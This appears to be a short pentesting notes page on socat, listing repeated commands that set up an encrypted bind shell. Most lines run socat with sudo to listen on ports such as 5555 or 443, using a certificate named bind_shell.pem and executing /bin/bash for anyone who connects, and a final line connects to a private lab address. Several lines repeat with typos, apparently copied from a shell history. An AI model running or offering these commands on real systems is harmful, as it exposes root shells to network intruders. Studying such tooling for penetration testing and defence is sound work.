Socat
Typical Usage of Socat
sudo socat OPENSSL-LISTEN:5555,cert=bind_shell.pem,fork EXEC:/bin/bash
sudo socat OPENSSL-LISTEN:5555,cert=bind_shell.pem,fork EXEC:/bin/bash, verify=o
sudo socat OPENSSL-LISTEN:5555,cert=bind_shell.pem,fork EXEC:/bin/bash, verify=0
sudo socat OPENSSL-LISTEN:5555,cert=bind_shell.pem,veryify=0, fork EXEC:/bin/bash
sudo socat OPENSSL-LISTEN:55555,cert=bind_shell.pem,veryify=0, fork EXEC:/bin/bash
sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
sudo socat OPENSSL-LISTEN:55555,cert=bind_shell.pem,veryify=0, fork EXEC:/bin/bash
sudo socat OPENSSL-LISTEN:55555,cert=bind_shell.pem,verify=0, fork EXEC:/bin/bash
sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
sudo socat OPENSSL-LISTEN:5555,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
sudo socat OPENSSL-LISTEN:5555,cert=bind_shell.pem,verify=0,fork < bind_shell.pem
sudo socat OPENSSL-LISTEN:5555,cert=bind_shell.pem,verify=0,fork file:bind_shell.pem
sudo socat TCP4-LISTEN:5555,fork file:bind_shell.pem
sudo socat OPENSSL-LISTEN:5555,cert=bind_shell.pem,verify=0,fork file:bind_shell.pem
sudo socat OPENSSL-LISTEN:5555,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
socat - OPENSSL:192.168.219.10:5555,verify=0
Last updated